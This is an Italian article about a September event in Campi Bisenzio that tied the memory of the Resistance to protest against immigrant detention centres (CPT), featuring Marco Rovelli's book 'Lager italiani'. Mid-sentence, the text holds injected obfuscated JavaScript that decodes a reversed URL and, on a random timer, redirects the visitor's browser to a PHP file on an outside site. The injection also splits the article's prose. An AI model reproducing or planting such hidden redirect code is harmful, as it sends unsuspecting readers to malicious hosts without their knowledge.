La Resistenza non è una cosa morta

image_pdfimage_print

Cosa c’entrano i partigiani con gli immigrati? La risposta è nell’iniziativa
– No al razzismo, no ai CPT – organizzata dal centro sociale
Camilo Cienfuegos di Campi Bisenzio lo scorso 2 settembre.
In quell’occasione il giornalista di Controradio Raffaele Palumbo ha
intervistato lo scrittore e cantante Marco Rovelli (ex componente
dei Les Anarchistes, ora nel gruppo LibertAria) autore del libro ”Lager italiani”, sulla vita e
le storie dei migranti dentro i Centri di Permanenza Temporanea
– CPT.
Il 2 settembre è una data importante per Campi: è la data della Liberazione
della città dai nazifascisti. Contemporaneamente all’iniziativa
dei ragazzi del Cienfuegos si svolgeva infatti la cerimonia ufficiale
e istituzionale per celebrare la Resistenza. Rovelli ha m (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andato a tale
proposito un messaggio chiaro: la Resistenza non è una cosa morta
da rinchiudere nel passato e celebrare solo nel ricordo, ma è un’istanza
viva ancora oggi: ci sono ancora un sacco di cose che viviamo a
cui fare resistenza.
Nella serata Saverio Tommasi ha recitato alcune pagine del libro,
edito da BUR nella collana Futuropassato.
Ricordiamo Tommasi come l’attore che si è rinchiuso in una gabbia
su Piazzale Michelangelo per protesta contro i CPT.
Proprio di Campi si è parlato infatti a livello ministeriale come possibile
sede del primo CPT toscano, idea a cui si sono opposti fermamente
i movimenti in difesa dei diritti degli immigrati, e anche il
WWF, che ritiene sia ora di smettere di considerare la Piana come
un posto dove collocare di tutto, invece che un’area verde da salvaguardare.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *